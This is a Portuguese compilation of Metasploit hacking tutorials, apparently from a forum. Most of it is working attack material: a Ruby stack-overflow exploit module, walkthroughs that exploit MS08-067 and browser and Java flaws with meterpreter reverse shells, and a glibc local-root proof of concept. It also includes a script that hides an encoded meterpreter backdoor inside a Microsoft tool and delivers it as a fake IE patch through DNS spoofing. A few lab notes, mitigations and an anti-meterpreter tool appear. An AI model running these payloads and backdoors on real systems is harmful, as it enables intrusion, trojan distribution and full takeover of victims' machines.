Metasploit


Adicionando exploit ao metasploit



 Adicionando Exploit ao MSF

Para adicionarmos um exploit ao metasploit, primeiramente devemos ter em mente as seguintes perguntas, por motivos de organização:
O que estou adicionando? Para qual sistema operacional ele é útil? O que ele
explora?

Entendeu mais ou menos?

Vou explicar. Vamos para o diretório padrão do msf, para isso digite:

root@bt:~# cd /pentest/exploits/framework3/
root@bt:/pentest/exploits/framework3# ls

HACKING documentation lib msfcli msfelfscan msfmachscan msfpescan msfweb test
README erros.txt lista.txt msfconsole msfencode msfopcode msfrpc plugins tools
data external modules msfd msfgui msfpayload msfrpcd scripts 
root@bt:/pentest/exploits/framework3#
Estamos no diretório padrão do msf (Na verdade o diretório padrão fica em
/opt/metasploit3/msf3/, este diretório é apenas um link simbólico.).
Agora entre no diretório modules:

root@bt:/pentest/exploits/framework3# cd modules/

Agora em exploits. (O que estou adicionando?)

root@bt:/pentest/exploits/framework3/modules# cd exploits/

Em windows. (Para qual sistema operacional ele é útil?)
root@bt:/pentest/exploits/framework3/modules/exploits# cd windows/
E por fim em misc. (O que ele explora?)

root@bt:/pentest/exploits/framework3/modules/exploits/windows# cd misc/

Ok, agora vamos adicionar nosso exploit neste diretório que estamos. Vamos dar o nome de "exploit_stackoverflow.rb". A extensão ".rb" significa que o exploit foi desenvolvido na linguagem Ruby. Utilizarei o nano, mais utilize o editor de sua
preferência.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc# nano
exploit_stackoverflow.rb

Agora insira o exploit abaixo:

http://pastebin.com/raw.php?i=H26uL5ih
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'Custom vulnerable server stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
custom vulnerable server.
},
'Author' => [ 'Peter Van Eeckhoutte' ],
'Version' => '$Revision: 9999 $',
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1400,
'BadChars' => "\x00\xff",
},
'Platform' => 'win',

'Targets' =>
[
['Windows XP SP3 En',
{ 'Ret' => 0x7c874413, 'Offset' => 504 } ],
['Windows 2003 Server R2 SP2',
{ 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(200)
], self.class)
end

def exploit
connect

junk = make_nops(target['Offset'])
sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end



Créditos do exploit para: “Peter Van Eeckhoutte


Salve com "Ctrl + X", informe que quer salvar pressionando Y e ENTER.

Ok, se ocorreu tudo certo aqui, basta abrirmos o msfconsole e ver nosso exploit recém adicionado.

root@bt:/pentest/exploits/framework3/modules/exploits/windows/misc#msfconsole



Agora vamos procurar pelo exploit "exploit_stackoverflow", para isso digitamos o comando search. (Óbvio não?). Veja na figura abaixo.





--------------------------------------------------------------------------------------------------------------------------------------

WebSploit Framework



WebSploit é um projeto Open Source para: Obras de engenharia social, Web Scan, esteiras e Análise, Exploiter automática, ataques de rede de apoio ..
[+] Autopwn - Usado De Metasploit para verificação e Exploit Serviço de Destino
[+] WMAP - Scan, Crawler alvo usado De Metasploit WMAP Plugin
[+] infector formato - injetar reversa e carga se ligam em formato de arquivo

[+] Scanner phpmyadmin
[+] LFI Bypasser
[+] Apache Scanner Usuários
[+] Dir Bruter
[+] administrador localizador
[+] MLITM Ataque - Homem esquerda no meio, XSS Ataques de phishing
[+] MITM - Man In The Middle Ataque
[+] Ataque Applet Java
[+] Ataque MFOD Vector
[+] USB Infecção Ataque
[+] ARP ataque DoS
[+] Ataque do assassino Web
[+] Ataque Atualização Falso
[+] Ataque Falso ponto de acesso

Link: Aqui  ou http://sourceforge.net/projects/websploit/files/latest/download?source=directory 
-------------------------------------------------------------------------------------------------------------------------------------- 

Metasploit SIP Penetration Testing Modules :: Tools

SIP biblioteca para Metasploit é desenvolvido para ajudar a SIP Testsing Penetração. Ele oferece recurso de autenticação que ajuda a criar testes simples. Ele inclui cinco módulos diferentes, com suporte de autenticação: testador de opções, Forcer bruta, enumerador, convidam testador e testador de inscrição. Todos os ataques poderiam realizar antes e após a autenticação de fuzz SIP serviços e serviços de valor acrescentado.
Link: Aqui ou packetstormsecurity.com/files/download/120053/sipmodules.zip


Como cortar computador remoto usando Metasploit? Explorando vulnerabilidade Java


Sempre que alguém diz PenTesting ferramenta, a primeira coisa que vem em nossa mente é Metasploit. Hoje, eu estou indo para demonstrar como utilizar a ferramenta Metasploit para explorar o popular java AtomicReferenceArray vulnerabilidade Violação Tipo (CVE-2012-0507).
Sobre o Metasploit :
Metsploit é uma ferramenta muito poderosa PenTesting. Metasploit Framework, uma ferramenta para o desenvolvimento e execução de código de exploração contra uma máquina de destino remoto. O Metasploit Project também é conhecido por ferramentas anti-forenses e evasão, alguns dos quais são construídos no Metasploit Framework. Ferramenta muito útil para coleta de informações, análise de vulnerabilidade, Desenvolvimento Exploit, exploits lado do cliente, ...
Quadro dominar o: Um curso livre de Offensive-Security A equipe de segurança ofensiva, juntamente com vários membros ativos da comunidade, fez um curso gratuito sobre o "Dominando o quadro" Metasploit Framework. O curso abrange coleta de informações, ataques de engenharia social, explorar o desenvolvimento, evitar Avanço AV e etc .. O curso está disponível aqui ou www.offensive-security.com/metasploit-unleashed/Introduction
Ei, onde você vai?! Espere um pouco, tomar esse curso Uma vez que eu demonstrar como utilizar o Metasploit. Porque, vai ser difícil de entender ou chato, se você ler essas coisas diretamente. Requisitos:
  • VirtualBox
  • Alvo OS (janelas, ...)
  • Distro PenTesting (Backtrack)
  • JRE 6 (versão sem patch)

CVE-2012-0507 é uma vulnerabilidade no JRE, devido ao fato de que a implementação da classe AtomicReferenceArray não verificar corretamente se a matriz é de um objeto esperado [tipo]. Um aplicativo Java malicioso ou applet poderia usar esta falha para causar Java Virtual Machine (JVM) para travar ou ignorar as restrições de Java sandbox.
Notícias sobre segurança: Essa vulnerabilidade afeta o Windows, Mac e Linux. No mês passado, malware Flashback infectar mais de 600 mil computadores Mac , explorando essa vulnerabilidade. Recentemente, o INSS , The Amnesty International UK sites injetado com código malicioso, que exploram a CVE-2012-0507.
Eu estou indo para demonstrar esta vulnerabilidade com o VirtualBox. Eu tenho a configuração duas máquinas virtuais ou seja, "Destino" e "BT5". Eu instalei o XP 2 no Target e R2 Backtrack 5 no 'BT5'. (? Precisam de ajuda para configurar o VM, leia isto: Laboratório de configuração PenTesting ).
Parte I: Preparando o computador de destino:
Inicie o "alvo" da máquina. Instalar o JRE 6.
Parte II: Preparação da máquina PenTesting:
Agora, começar a BT5. Abra o terminal e digite "msfupdate". Isto irá atualizar o Metasploit Framework (MSF) com as últimas façanhas e cargas úteis. Como CVE-2012-0507 é o mais recente vulnerabilidade, você tem que atualizar o MSF antes de prosseguir.
conexão lenta de Internet?! Se você tem conexão de internet lenta, então você pode baixar o módulo java_atomicreferencearray sozinho em vez de atualizar todos os módulos. Faça o download do java_atomicreferencearray.rb e colar nesta pasta "opt/metasploit/msf3/modules/exploits/multi/browser / /" Então, Download CVE-2012-0507.jar e cole nesta pasta "/ opt/metasploit/msf3/data/exploits /"
Parte III:

Explorando o Java AtomicReferenceArray Vulnerabilidade Violação Tipo:

Etapa 1: Abra o Terminal e "msfconsole" tipo. Isto irá trazer o console Metasploit, aqui você pode interagir com o MSF. Etapa 2: Tipo "use exploit / multi / browser / java_atomicreferencearray". Este comando irá usar o módulo java_atomicreferencearray.rb para o ataque.

Agora digite "mostrar opções" para mostrar as configurações que estão disponíveis e / ou necessários para este módulo específico.

Agora digite "definir SRVPORT 80". e "definir URIPATH /".

Passo 3: Carga Set Tipo "cargas Show", essa vontade exibe a lista de cargas. Nós vamos usar o 'reverse_tcp' payload. Esta carga terá conexão TCP inversa do alvo para PenTesting máquina. Tipo 'set carga java / Meterpreter / reverse_tcp' no console.

definir LHOST [IP_address]: A fim de obter conexão reversa, nós temos que definir o nosso IP no LHOST. Abra o terminal e "ifconfig" tipo. Isto irá exibir a informação de IP da nossa máquina PenTesting. O IP será "192.168.56.x". Por exemplo, deixe-me dizer o ip é 192.168.56.10. Agora Digite o msfconsole como "conjunto LHOST 192.168.56.10".


Parte IV: Rompendo a máquina de destino:

Então, você está pronto?! Vamos invadir o computador de destino. Etapa 1:

Digite "exploit" no msfconsole. Isto irá iniciar o manipulador inversa à nossa máquina e que vai esperar alguém que vai ligar para o servidor HTTP nosso (Ex: http://192.168.56.10). Uma vez vítima ligar para o nosso servidor, ele irá enviar um frasco que vai explorar a vulnerabilidade CVE-2012-0507. passo 2: Abra o Firefox / IE na máquina de destino. Digite "http://192.168.56.10". Ele carrega nada, mas exploit será executado em segundo plano.
Etapa 3: Abrir a máquina BT5, ele irá exibir o seguinte resultado:

Agora digite "sessões", isto irá mostrar a lista de sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar com o Target.

Passo 4: upload de arquivos Yeeeh ..! temos backdoor na máquina de destino, agora podemos executar comandos no alvo.

Por exemplo, digitando "sysinfo 'irá exibir as informações do sistema.


Você também pode carregar e executar seus próprios arquivos executáveis ​​na máquina de destino. 'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo. 'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.


Dicas de Segurança:
Atualize seu JRE para a versão mais recente.


conclusão:
Espero que este artigo lhe deu uma boa visão como usar Metasploit Framework para explorar a vulnerabilidade Java. Espero que isso irá ajudá-lo a entrar no mundo PenTesting ..!

windows Hacking usando MS12-037 Internet Explorer Vulnerabilidade mesmo ID

MS12-037 Internet Explorer Vulnerabilidade mesmo ID Microsoft Internet Explorer 8 não tratar adequadamente os objetos na memória, o que permite que atacantes remotos para executar código arbitrário, acessando um excluído objeto, também conhecido como "O mesmo ID propriedade Vulnerabilidade de execução remota de código." Duas tecnologias no sistema operacional moderno são usados ​​para fazer façanhas desse tipo ainda mais difícil: DEP (Data Execution Prevention) e ASLR (address-space randomização layout). DEP se destina a impedir que um aplicativo ou serviço de execução de código a partir de uma região da memória não-executável. Isso ajuda a evitar que certas façanhas código da loja através de um estouro de buffer. ( wiki ) ASLR carrega módulos de software, tais como DLLs na memória em locais aleatórios. Movendo DLLs do sistema em torno torna mais difícil para hackers para adivinhar onde encontrar as funções de biblioteca que necessitam, como URLDownloadToFile () e CreateProcess (). Mas DEP e ASLR não fazem execução remota de código ataca impossível, apenas mais complicado. No caso da CVE-2012-1875, ASLR pode ser ignorada por tentar forçar o Internet Explorer para localizar e carregar uma versão antiga do Microsoft C Runtime DLL - um que foi compilado antes ASLR se tornar a norma, e portanto, não o suporta. Sempre que você carregar uma DLL não ASLR, mesmo em um programa de ASLR habilitada, você pode prever onde isso vai acabar. E DEP é contornado usando uma técnica conhecida como ROP, ou retorno de programação orientada.

Exploit para a vulnerabilidade do Internet Explorer mesmo ID (CVE-2012-1875):


Requisitos:
  • Alvo OS: XP3
  • Atacante OS: Backtrack ou qualquer PenTesting Distros
Como de costume, você tem que criar duas máquinas virtuais em seu VirtualBox. Preparando sistema da vítima: Instale o XP3 em um dos VM. Alterar o adaptador de rede da VM para o Host-somente o adaptador. (Se você não sabe o que estou falando, então use este manual do Virtualbox ) Preparando o sistema Atacante: Atualizar os módulos do Metasploit, digitando o seguinte comando no Terminal: msfupdate Ou você pode baixar o " ms12_037_same_id.rb módulo 'e pasta neste diretório "opt/metasploit/msf3/modules/exploits/windows/browser / /" Configurar as definições para a sua exploração em Metasploit: Abra o Terminal e "msfconsole" tipo para obter o console Metasploit. Tipo "use exploit/windows/browser/ms12_037_same_id" no console. Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console. Comando: SRVHOST conjunto 192.168.56.10 Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Comando: URIPATH set / Detalhes: O caminho em que a nossa exploração será executado. Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Ok, vamos lançar o exploit. Digite "proeza" no console.

Agora, o exploit é iniciado. Nossa exploração está funcionando em "http://192.168.56.10:8080/". Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit:
[*] Cliente requerente: / [*] Usando o JRE ROP [*] Enviando html [*] Envio de estágio (752.128 bytes) para 192.168.56.12 [*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1685)

Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Agora, você pode controlar o sistema vítima de computador usando Meterpreter. Por exemplo: 'Upload / Test.exe c: \ \ ", este comando irá fazer o upload do Test.exe a partir da raiz (' file system 'dir) da pasta do BT5 para a unidade C do alvo. 'Execute-f C: \ \ Test.exe ", este comando irá executar o nosso arquivo carregado no Target.

Microsoft XML Core Services Vulnerabilidade Metasploit Demonstração

CVE-2012-1889: Microsoft XML Core Services Vulnerabilidade Uma vulnerabilidade no Microsoft XML Core Services 3.0, 4.0, 5.0 e 6.0 permite a execução remota de código se um usuário visualiza uma página web especialmente criada usando o Internet Explorer. Um invasor não teria como forçar os usuários a visitar um site deste tipo. Em vez disso, o invasor teria que convencer os usuários a visitar o site, geralmente fazendo com que eles cliquem em um link em uma mensagem de e-mail ou mensagens instantâneas, que os leva para o site do atacante. A vulnerabilidade afeta todas as versões suportadas do Microsoft Windows, e todas as edições com suporte do Microsoft Office 2003 e Microsoft Office 2007. Aqui você pode a lista completa.
A vulnerabilidade existe quando MSXML tenta acessar um objeto na memória que não foi inicializado, o que pode corromper a memória de tal maneira que um invasor executar um código arbitrário no contexto do usuário conectado.
Vou demonstrar como usar a ferramenta Metasploit para testar se sua rede vulnerável ou não. Abra o Terminal e digite "msfupdate" para obter as últimas módulos Metasploit. Quando a atualização for concluída, em seguida, digite "msfconsole". Em seguida, digite o seguinte comando no console "uso explorar / windows / navegador / msxml_get_definition_code_exec". Agora, temos de saber a lista de configurações disponíveis para este módulo de exploração. A fim de obter a lista, você pode digitar "mostrar opções" no console. Comando: SRVHOST conjunto 192.168.56.10 Detalhes: Aqui o 192.168.56.11 é o IP do Backtrack. Você pode obter este ip, basta digitar o "ifconfig" no terminal. Comando: lhost conjunto 192.168.56.10 Comando: URIPATH set / Detalhes: O caminho em que a nossa exploração será executado. Como de costume, nós podemos usar carga TCP reversa para este ataque também. Então digite o seguinte comando no console do Metasploit:
definir payload windows / Meterpreter / reverse_tcp

Digite "proeza" no console.

Uma vez que a vítima carrega o URL em seu navegador IE, você receberá a seguinte mensagem em seu console metasploit: [*] Msxml_get_definition_code_exec - Usando msvcrt ROP [*] Msxml_get_definition_code_exec - 10.0.1.79:1564 - Enviando html [*] Envio de estágio (752.128 bytes) para 192.168.56.12 [*] Meterpreter uma sessão aberta (192.168.56.10:4444 -> 192.168.56.12:1565) Digite "sessões" para listar as sessões ativas. Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Digite "sysinfo" no Meterpreter para obter as informações do sistema.

[Metasploit Tutorial] Hacking Windows XP usando o endereço IP

Você acha que é possível cortar algum computador com um apenas um endereço de ip?! A resposta é sim, se você está usando sem correções (vulnerável) OS. Se você não acredita em mim, então leia o artigo completo. Neste artigo eu estou indo para demonstrar como hackear um computador remoto, explorando a falha de análise no código canonização caminho da Netapi32.dll através do Serviço de Servidor ( CVE-2008-4250 ). Antes de saltar para o processo de exploração real, deixe-me dar mais detalhes sobre esta vulnerabilidade no serviço de Servidor. Detalhes sobre Vulnerabilidade Server Service (MS08-067): Serviço Microsoft Windows Server fornece suporte para compartilhamento de recursos, como arquivos e serviços de impressão através da rede. O serviço do servidor é vulnerável a uma vulnerabilidade de execução de código remoto. A vulnerabilidade é causada devido a um erro no processamento de sequências quando netapi32.dll diretório caráter de travessia em nomes de caminho. Isto pode ser explorado para corromper a memória pilha por exemplo o envio de solicitações RPC contendo nomes de caminho especialmente criadas para o componente de serviço do servidor. O 'NetprPathCanonicalize ()' função no arquivo 'netapi32.dll' é afetado. Um pedido malicioso para os resultados sistema vulnerável compromisso completa de computadores vulneráveis. Essa vulnerabilidade afeta o Windows XP, Windows 2000, Windows Server 2003, Windows Vista e Windows Server 2008. Mas Atacantes requerem acesso autenticado no Windows Vista e Server 2008 plataformas para explorar esta questão. Explorando o MS08-067 usando Metasploit: Requisitos:
  • VirtualBox
  • Backtrack 5
  • Alvo OS (XP)
Etapa 1: Criar duas máquina virtual (VM), nomeadamente "Target" e "BT5". Instalar o XP dentro Alvo VM e Backtrack dentro BT5. Inicie os dois VMs. Se você não sabe como criar máquinas virtuais, então por favor leia este manual VirtualBox . Passo 2: Encontrar o endereço IP de destino Abra o prompt de comando na máquina de destino (XP). Digite "ipconfig" para encontrar o endereço IP do sistema Target.
Hackers usam métodos diferentes para encontrar o endereço IP da vítima. Para por exemplo., Enviando link que irá obter os detalhes ip ou usar o Angry IP Scanner.

Passo 3: Coleta de Informações Agora vamos coletar algumas informações sobre a máquina de destino. Para este fim, vamos usar a ferramenta nmap. Abra o terminal na máquina BT5 (Backtrack) e digite "nmap-O 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino. Se você olhar para o resultado, você pode encontrar a lista de portas abertas e versão OS.

Passo 4: Metasploit Agora, abra o Terminal na máquina BT5 (Backtrack) e digite "msfconsole". O msfconsole é a interface mais popular para o Metasploit Framework. Ele fornece um "tudo-em-um" console centralizado e permite acesso eficiente a praticamente todas as opções disponíveis no Metasploit Framework. Vamos usar o comando de busca para encontrar os módulos de exploração com a NetAPI palavra-chave. Tipo "busca netap i". Agora você pode ver a lista de módulos de combinar com o NetAPI.

Nós vamos explorar MS08-067, assim tipo "uso exploit/windows/smb/ms08_067_netapi". Passo 5: Carga Set Como de costume, vamos usar a carga TCP reverso para esta façanha também. Tipo "set payload windows / Meterpreter / reverse_tcp" no msfconsole. Passo 6: Opções Tipo "definir LHOST 192.168.56.10". Aqui 192.168.56.10 é o endereço IP da máquina Backtrack. Você pode encontrar o endereço de ip pelo comando 'ifconfig' digitação no Terminal. Tipo "definir rhost 192.168.56.12". Aqui 192.168.56.12 é o endereço IP da máquina de destino.

Passo 7: Explorando Ok, é hora de explorar a vulnerabilidade, "proeza" tipo no console. Se a exploração for bem sucedido, você pode ver o seguinte resultado.

Agora podemos controlar o computador remoto usando o Meterpreter. Por exemplo, digitando "screenshot" vai pegar a imagem do sistema da vítima.

---------------------------------------------------------------------------------------------------------------------------------------------------------------


Curso de metasploit

Curso de Metasploit Click Aki Metasploit curso



Metasploit Exploiting

acesso a uma máquina (virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico.
O cenário utilizado foi o seguinte:

Linux: Intrusão Simples com Metasploit
Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.
Quer saber mais sobre Virtualbox? Digite "virtualbox" no campo de pesquisa aqui do VOL que encontrará ótimos artigos/dicas sobre o mesmo.
Scanning com Nmap e Metasploit
Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o Backtrack e digite o seguinte comando:
# nmap -v --script=smb-check-vulns 192.168.0.0/24
-v = Modo Verbose
--script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.

Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.
Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...

Obtemos nosso console do msf. Dei uma personalizada na saída. :-)
Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit #E finalmente executamos nosso exploit.
Observem a imagem abaixo.

Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.

Linux: Intrusão Simples com Metasploit
Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.
Opções Metasploit
Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do sistema operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos através do script do nmap que nosso alvo é vulnerável, nós podemos realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.
Certo, mas como? Vamos utilizar um módulo auxiliar presente no Metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.
Executaremos os seguintes comandos no console do msf:
use auxiliary/scanner/smb/smb_version #Falamos que queremos utilizar o scanner smb_version.
set RHOSTS 192.168.0.186 #Aqui eu setei um único host (192.168.0.186), mas poderia especificar um range, exemplo, 192.168.0.0/24.
run #Comando para executar nosso scanner.


Linux: Intrusão Simples com Metasploit
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.
use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
set TARGET 31 #Aqui eu digo que o alvo usa
exploit #E finalmente executamos nosso exploit.
Na imagem abaixo,com o comando show targets são listados todos os S.O.s vulneráveis a este exploit (ms08_067).


Veja abaixo que iremos utilizar a opção 31.


Veja o ataque agora.


Veja que não foi realizada a etapa de fingerprint com o alvo, pois "falamos" para o exploit o S.O. que ele encontrará em seu destino.
Ok! Finish! The end! Heheheh
Ah!


É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.
--------------------------------------------------------------------------------------------------------------------------------------

Atualize MPGe - um invólucro de msfpayload e msfencode do Metasploit.

MPGe é um invólucro de msfpayload e msfencode do Metasploit. É possível usá-lo com Backtrack e Backbox.This wrapper cria cavalos de tróia para o Microsoft Windows, Linux, Mac OS X Panther, Tiger e Leopard Lion. Para Mac OS X é possível criar um shell reverso clássico ou criar um shell reverso inserido em um pacote. Pkg ou criar arquivos. App. Eu tento o meu programa depois entre duas máquinas virtuais: Primeiro anfitrião Mac Book (preto) e segundo host virtual Windows XP. Antes de eu usar o meu programa entre dois reais Mac OS X: O Livro primeiro Mac (preto) eo segundo Mac iBook G4 PowerPC (branco) com OS Tiger. Estes dois foram Mac conectados à rede local (intranet). Mac OS X Livro (preto) está em ouvir e esperar o shell reverso. O segundo mac osx Mac iBook G4 PowerPC receber um pacote (um pacote de arquivos. Ou. Dmg) e quando o usuário clica no arquivo de inserir uma senha como root e ativar o shell shell.The reversa reversa com script mal é um jogo não necessariamente muito sucesso não se preocupe. 
Plataforma: Unix / Linux
Características: 
Baixar versão mais recente: Mpge.tgz (17,5 MB)  Encontrar outra versão |  Leia mais aqui: http://sourceforge.net/projects/mpge/

--------------------------------------------------------------------------------------------------------------------------------------

hacking Google via metasploit

foi muito horrível para a Microsoft. Primeiro, a vulnerabilidade aurora no IE e depois que o problema local de privilégio escalada em todas as janelas do sistema. As imagens abaixo mostram a combinação de duas vulnerabilidades para obter acesso a uma máquina e depois que escalaste privs para o sistema ...


Imagem


Imagem


Imagem


Imagem


mais imagens disponíveis em "Hacking Google the Metasploit way" oder "from Aurora to god with msf" | www.s3cur1ty.de

hf
m-1-k-3


Remote Desktop com VNC via metasploit

Mostro com acessar um desktop remotamente com VNC via metasploit uma de muitas ferramentas encontradas no metasploit.

O que eu fiz?
Configurei o metasploit para injetar uma carga vncinject usando o exploit ms08_067_netapi

Código:
use exploit/windows/smb/ms08_067_netapi
set RHOST IP_da_vitima
set PAYLOAD windows/vncinject/bind_tc
exploit-
Baixar


Antimeter Tool - Anti Meterpreter (Metasploit) for Windows

Link: Aqui ou  http://www.mertsarica.com/codes/antimeter2.zip


USO

Código:
antimeter.exe [argumentos]


Argumentos Opcionais:
-t [intervalo de tempo] Varre a memória em cada intervalo de tempo especificado (Padrão intervalo de tempo é um (1) minuto)
-a Automaticamente mata o processo Meterpreter (desativado por padrão)
-d Apenas detecta o processo Meterpreter (desativado por padrão)
-e Adiciona processo para a lista de exclusão (por exemplo, uma "blacklist")

EXEMPLOS
Varre a memória em cada 5 minutos, mata o processo Meterpreter automaticamente e é habilitado o modo verbose:

Código:
antimeter.exe -t 5 -a -v


Varre a memória em cada minuto e só detecta o processo Meterpreter:

Código:
antimeter.exe -n


Varre a memória em cada minuto, sendo os processos "explorer e winlogon" são excluídos da análise:

Código:
antimeter.exe -e explorer.exe,winlogon.exe


Ai a pergunta? Porque usar uma ferramenta dessas, sendo que eu uso Linux ou Mac, por exemplo?

A resposta é "PORQUE SIM!!!", deixando as zoeira de lado, quando você tem ambientes heterogênios e grandes, há uma grande tendência para ter servers e desktops Windows.

Então se for o caso está ai uma solução, para um SO tão fraco quanto Windows (no caso ele mesmo!)


Exploit no pacote glibc-2.5.49.el5_5.i686 CVE-2010-3847 escala de privilegios p/ root

Executando o exploit no pacote glibc-2.5.49.el5_5.i686 CVE-2010-3847 escala de privilégios -> root em qualquer Linux sem uso do Metasploit.


A falha que estou falando é notícia no site underlinux.org
Privilégios de Root Através de Vulnerabilidade na Biblioteca GNU C e maiores detalhes em:
https://bugzilla.redhat.com/show_bug.cgi?id=643306 e em CVE-2010-3847 - Advisories - Community, pois até a data deste artigo a pedido do fabricante não liberam no CVE, mais informações


OBS: Testado e comprovado com sucesso em VM local que produzi em LAB, mas não utilizando a produção ou derivados. Tenha cuidado.


O autor deste artigo não se responsabiliza por dados mediante este artigo ou derivados.
PoC Exploit (Proof of Concept Exploit)


Crie um usuário teste, set a senha e depois autentique com o mesmo

Código:
$ mkdir /tmp/exploit
$ ln /bin/ping /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ ls -l /proc/$$/fd/3
$ rm -rf /tmp/exploit/
$ ls -l /proc/$$/fd/3
$ cat > payload.c
void __attribute__((constructor)) init()
{
setuid(0);
system(“/bin/bash”);
}
^D
(Ctrl+D) <— parte as teclas para salvar e sair
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
$ LD_AUDIT=”\$ORIGIN” exec /proc/self/fd/3
# whoami
root
id
uid=0(root) gid=500(teste)



Mitigação
========
Evitar de criar usuários em filesystems sem permissão nosuid
Caso não seja possível, há um paleativo:

Citação:
# mount -o bind /tmp /tmp
# mount -o remount,bind,nosuid /tmp /tmp


Solução
=======
Atualizar glibc-2.5.49.el5_5.i686 -> com yum update caso já haja glibc atual.
Foi exploitado sem sucesso em uma VM Local no CentOS 5.5, sem sucesso. O que pude concluir que a atualização da glibc contorna a falha, mas deve-se avaliar melhor e com cautela, pois a atualização da glibc, sem total atualização do SO de CentOS 5.3 -> CentOS 5.5 pode o acarretar em “crash” total do SO, devido à esta biblioteca ser uma das principais do SO.


"Encobrindo" um backdoor do meterpreter em um Patch do IE

Aqui está um tutorial sobre como criar um backdoor no Meterpreter indetectável e encobri-lo como uma atualização de segurança do Internet Explorer. Eu criei um script bem básico que cria o backdoor no Meterpreter e inicia o multi/handler.

Vou injetar o payload no Microsoft Windows Malicious Software Removal Tool, que está disponível para download aqui. ou  Download details: Microsoft® Windows® Malicious Software Removal Tool (KB890830)

E eu vou usar o ettercap para fazer dns_spoof na vítima usando uma página falsa do Internet Explorer que seria equivalente à atualização de segurança.

Salve meu script como myscript.sh:

Código:
#!/bin/sh
clear
cd /pentest/exploits/framework3
echo "*************************************"
echo "              creating a meterpreter backdoor          "
echo "*************************************"
echo -n "lhost ?"
read lhost
echo -n "lport?"
read lport
echo -n "path to output file?"
read filename
echo -n "path to input file?"
read originalfile
echo "creating payload ..."
./msfpayload windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x $originalfile -o $filename
echo "payload created !"
echo "starting multi/handler ..."
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport E


Faça o meu script ser executável:

Código:
chmod 755 myscript.sh


Execute o meu script:

Código:
./myscript.sh lhost => your ip lport => 5555 output => /root/backdoor.exe input => /root/windows-kb890830-v3.12


